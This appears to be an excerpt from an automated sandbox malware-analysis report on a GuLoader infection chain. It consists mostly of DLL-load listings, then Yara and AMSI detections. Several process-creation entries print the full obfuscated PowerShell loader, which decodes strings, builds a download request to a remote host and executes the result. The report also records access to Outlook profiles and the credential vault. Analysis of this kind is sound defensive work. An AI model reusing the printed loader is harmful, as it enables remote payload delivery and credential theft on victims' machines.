Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: cdprt.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: smartscreenps.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: duser.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.ui.fileexplorer.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: uiribbon.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: networkexplorer.dll Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptdlg.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msoert2.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msimg32.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptui.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msftedit.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: explorerframe.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sxs.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: actxprxy.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptdlg.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msoert2.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msimg32.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptui.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msftedit.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: explorerframe.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sxs.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe File written: C:\Users\user\AppData\Roaming\834O80R0\834logri.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\msftedit.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.1849877710.0000000008470000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000010.00000002.1849877710.0000000008470000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000010.00000002.1845941014.00000000073D0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .Management.Automation.pdb source: powershell.exe, 00000010.00000002.1845941014.0000000007324000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: wab.exe, raserver.exe
Source: Binary string: RAServer.pdb source: raserver.exe
Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000010.00000002.1849877710.0000000008470000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("POWERSHELL", ""cls;write 'Fantasibilledernes Ansttels", "", "", "0");
Yara detected GuLoader
Source: Yara match File source: 00000014.00000002.1970441632.0000000006340000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1851059403.000000000C1B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1850596565.00000000086A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1839918830.0000000005A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2072484963.000001A8D5541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Scyphiform245)$global:Bonaire = [System.Text.Encoding]::ASCII.GetString($Unantiquated)$global:Prioritetshaverens=$Bonaire.substring($Marmorgulvenes,$Renhedsgraders)<#Kapselaabnere De
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Glutinate $Roup $Uncollared), (Skjortenaales142 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Congresses = [AppDomain]::CurrentDomain.GetAssemblies()$glo
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Cassare)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Slyngelstregs, $false).DefineType($Banshee, $Beke
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Scyphiform245)$global:Bonaire = [System.Text.Encoding]::ASCII.GetString($Unantiquated)$global:Prioritetshaverens=$Bonaire.substring($Marmorgulvenes,$Renhedsgraders)<#Kapselaabnere De
Obfuscated command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Sh
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Sh
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Sh Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Sh Jump to behavior
Suspicious powershell command line found
